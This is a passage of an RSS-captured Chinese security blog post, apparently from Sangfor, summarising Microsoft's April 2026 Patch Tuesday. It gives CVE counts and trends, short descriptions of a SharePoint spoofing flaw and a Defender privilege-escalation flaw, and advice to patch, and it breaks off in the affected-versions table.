41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041668" data-ratio="0.5314814814814814" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8abe2f1d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxSjrvE9mtghPwceXIVDb7ADVbWxksmnl9icL82VvVIfXDvE9KzKXzJ3oe5smnHic1XTJueicLQTSFrws4KY81Eov5D3eu1qbIulRY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16252%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=298c4a49&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525339%26idx%3D1%26sn%3Daaab6e4838ba21ae6ebb1cfa6018c207">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 15 Apr 2026 19:40:00 +0800</pubDate>
    </item>
    <item>
      <title>微软补丁日安全通告|4月份</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525339&amp;idx=2&amp;sn=f5d9f09c0128dbbf80d8f2a51f0ea2a5</link>
      <description>2026年4月15日（北京时间），微软发布了2026年4月安全更新，共发布了247个CVE的补丁程序，比上月增多了154个。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-15 19:40</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c35d811d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxT5icZibXA3kqNfboibeb2CyKmoLPjPdDOfaicB0aAu5nmdjrY1JoGO0l3eGmic0VlIeGeNVmtOtJ0TnhCWfDTw7y4tzXkk7NjYsn60%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041681" src="https://wechat2rss.xlab.app/img-proxy/?k=af17876d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRlhKRff4c5nnUSgjYnEbPqSVxUKhaMb89Ga5NdzBcB4FIicKwJ5icDmXonhuicHfibtWG1GEzRLaylPMCoUXU7sCTfhVTpySO13bs%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月15日（北京时间），微软发布了2026年4月安全更新，共发布了247个CVE的补丁程序，比上月增多了154个。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在漏洞安全等级方面，存在10个标记等级为“Critical”的漏洞，187个漏洞被标记为“Important/High”等级的漏洞； 在漏洞类型方面，主要有62个远程代码执行漏洞，93个权限提升漏洞以及25个信息泄露漏洞。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞数据分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041679" src="https://wechat2rss.xlab.app/img-proxy/?k=18396642&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRTsBhUz3FkLaGEZ0QV01icczZG0B3SECNcsUuVdS47GSFOibWE62QGvpL9MzX4NzMCSVJhO1uBtGGZiaOc5v9NFic9kkPfMZusmZc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026年漏洞数量趋势</span></strong></p></div></div></div></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041682" data-ratio="0.5698795180722892" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="830" src="https://wechat2rss.xlab.app/img-proxy/?k=7bdc9189&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxQOZEgOdM5ERH7uFE4lP4tXF890oVehYD8WEOZXqSD4aiaf9yaaZf1WSibJdfyVxYDwhicFLQcCbyEvicryibiaHYLialDbtyDibMw7ZJE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">图 1 近一年微软补丁漏洞修复情况</span></p></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">总体上来看，微软本月发布的补丁数量为247个，有10个 Critical 漏洞补丁。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">千里目安全技术中心在综合考虑往年微软公布漏洞数量的数据统计和今年的特殊情况，初步估计微软在今年五月份公布的漏洞数将比今年四月份少。漏洞数量将会维持在100个左右。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041678" src="https://wechat2rss.xlab.app/img-proxy/?k=e357187b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTViaibcBBAt5Kwichg73Yld72XzcMxUo6YmPAfT3V9sSnHxkicdxN6jBjZd38Yr1ic8sacyo0oCgG4fCBSvRR7njSKTiawTX4bjia1Ts%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">历史微软补丁日4月漏洞对比</span></span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2023-2026年，4月份的漏洞数趋势如下图：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041680" data-ratio="0.5698795180722892" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="830" src="https://wechat2rss.xlab.app/img-proxy/?k=511cbb3a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxTESqKJxmo8kMBMwVxkaaicTN4waSQf9MgojeaV2eccy0GGZMya9iafKumNBjWH1T98oLjTl59Ggr9CKn6VicnRKDbHxZpoSCYsQw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">图 2 微软近年4月Windows补丁漏洞数量对比</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2023-2026年，4月份的漏洞危险等级趋势和数量如下图：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041687" data-ratio="0.5698795180722892" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="830" src="https://wechat2rss.xlab.app/img-proxy/?k=fed833e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxQmersm8ibtnaRtA5gGPoDPdFUYtNe87UrPgibOBRvnZ2YHyEzCPxGlvBDzftJbTVFiaaic7KKLDJkaX63mMgPueMQdysnEbYJAfMs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">图 3 微软近年4月漏洞危险等级对比</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2023-2026年，4月份的漏洞各个类型数量对比如下图：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041686" data-ratio="0.5698795180722892" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="830" src="https://wechat2rss.xlab.app/img-proxy/?k=47292420&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FAPc6NwjLsxRkcoI9uqibWH1CbZ5r4dRwjOtsWU8U6UnrKPpDrnW2UHzPGJib9JPXOBLicgjc1zsTialEtibt1L1QFqgEKqfhAFCYj4icFSpWdy9Tg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">图 4 微软近年4月漏洞类型对比</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">数据来源：根据微软官方安全更新通告中的数据统计</span></p></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">从漏洞数量来看，今年相较去年增多。</span></span></strong><span leaf="">微软在2026年4月份爆发的漏洞相较于去年增多。本月出现了247个漏洞补丁，并且有10个 Critical 类型的漏洞补丁。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">从漏洞的危险等级来看，相较去年“Critical”等级的漏洞数量减少，“Important/High”等级的漏洞数量增多。</span></span></strong><span leaf="">本月出现了10个“Critical”等级的漏洞，相较去年减少了约9%；本月出现了187个“Important/High”等级的漏洞，相较去年增多了约67%。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">从漏洞类型来看，RCE类型的漏洞数量增多，DoS类型的漏洞数量减少，EoP类型的漏洞数量增多，需要引起高度重视，</span></span></strong><span leaf="">尤其是RCE漏洞在配合社工手段的前提下，甚至可以直接接管整个局域网并进行进一步扩展攻击。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">重要漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041685" src="https://wechat2rss.xlab.app/img-proxy/?k=4ca95e70&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTiafkp1uARjUMn4kgtibzBRnTVCrPSezJ6DVcEiafDog26uWCFIYoWoUJMQVBCdCBeB5PkuyY5VBDHoA7bzJ8KFA6miak02wElEmE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 16px;color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">Microsoft SharePoint Server 欺骗漏洞 CVE-2026-32201</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Microsoft SharePoint Server 是微软推出的企业级协作与内容管理平台，为企业提供文档管理、协作站点、搜索服务、工作流与权限管理等核心服务，广泛应用于各类企业门户、文档中心与业务流程平台，负责处理非结构化与结构化内容、保障协作效率与访问安全。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">其中存在欺骗漏洞，攻击者可以利用该漏洞在网络上实施欺骗攻击，可能诱导用户访问恶意站点或泄露敏感信息。经过评估，该漏洞已被发现用于实际攻击，危害较大，我们建议用户及时更新微软安全补丁。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 16px;color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">Microsoft Defender权限提升漏洞 CVE-2026-33825</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Microsoft Defender 是微软推出的终端安全防护系统，为企业提供恶意软件防护、实时检测、漏洞管理、攻击面减少与权限管理等核心安全服务，广泛应用于各类 Windows 业务系统、服务器与云工作负载，负责检测与阻断威胁、保障系统完整性与访问安全。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高权限。经过评估，该漏洞危害较大，我们建议用户及时更新微软安全补丁。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041683" src="https://wechat2rss.xlab.app/img-proxy/?k=5578f273&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTOx4g4v6eob60aHQxmNqX8bT4FWM5MJlfmr4hN3Bb1VicLVPG5KibRP41ODhK3MDZtk2LsorScFOoHtl77r82scAJNrroOPvr2Q%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">影响范围</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><table style="border-collapse:collapse;width:425.0000pt;mso-table-layout-alt:fixed;border:none;mso-border-left-alt:0.5000pt solid windowtext;mso-border-top-alt:0.5000pt solid windowtext;mso-border-right-alt:0.5000pt solid windowtext;mso-border-bottom-alt:0.5000pt solid windowtext;mso-border-insideh:0.5000pt solid windowtext;mso-border-insidev:0.5000pt solid windowtext;mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="233" width="233" valign="center" style="padding: 3.75pt 7.5pt;border-width: 1pt;border-style: solid;border-color: windowtext;"><p style="text-align:center;word-break:break-all;"><b><span style="font-family:仿宋;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:微软雅黑;color:rgb(0,0,0);font-weight:bold;font-size:10.5000pt;"><font face="仿宋"><span leaf="">漏洞名称、</span></font><font face="Times New Roman"><span leaf="">CVE</span></font><font face="仿宋"><span leaf="">编号</span></font></span></b></p></td><td data-colwidth="616" width="616" valign="center" style="padding: 3.75pt 7.5pt;border-width: 1pt;border-style: solid;border-color: windowtext;"><p style="text-align:center;word-break:break-all;"><b><span style="font-family:仿宋;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:微软雅黑;color:rgb(0,0,0);font-weight:bold;font-size:10.5000pt;"><font face="仿宋"><span leaf="">受影响版本</span></font></span></b></p></td></tr><tr><td data-colwidth="233" width="233" valign="center" style="padding: 0pt;border-left: 1pt solid windowtext;border-right: 1pt solid windowtext;border-top: none;border-bottom: 1pt solid windowtext;"><p style="text-align:center;"><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">Microsoft SharePoint</span></span><span style="font-family:仿宋;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;mso-ansi-font-weight:normal;font-size:10.5000pt;"><font face="Times New Roman"><span leaf="">Server</span></font></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><font face="仿宋"><span leaf="">欺骗漏洞</span></font></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf=""><br/></span></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">CVE-2026-32201</span></span></p></td><td data-colwidth="616" width="616" valign="center" style="padding: 0pt;border-left: 1pt solid windowtext;border-right: 1pt solid windowtext;border-top: none;border-bottom: 1pt solid windowtext;"><p style="text-align:center;"><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">Microsoft SharePoint Server Subscription Edition</span></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf=""><br/></span></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">Microsoft SharePoint Server 2019</span></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf=""><br/></span></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">Microsoft SharePoint Enterprise Server 2016</span></span></p></td></tr><tr><td data-colwidth="233" width="233" valign="center" style="padding: 0pt;border-left: 1pt solid windowtext;border-right: 1pt solid windowtext;border-top: none;border-bottom: 1pt solid windowtext;"><p style="text-align:center;"><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">Microsoft Defender</span></span><span style="font-family:仿宋;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;mso-ansi-font-weight:normal;font-size:10.5000pt;"><font face="仿宋"><span leaf="">权限</span></font></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><font face="仿宋"><span leaf="">提升漏洞</span></font></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf=""><br/></span></span><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">CVE-2026-33825</span></span></p></td><td data-colwidth="616" width="616" valign="center" style="padding: 0pt;border-left: 1pt solid windowtext;border-right: 1pt solid windowtext;border-top: none;border-bottom: 1pt solid windowtext;"><p 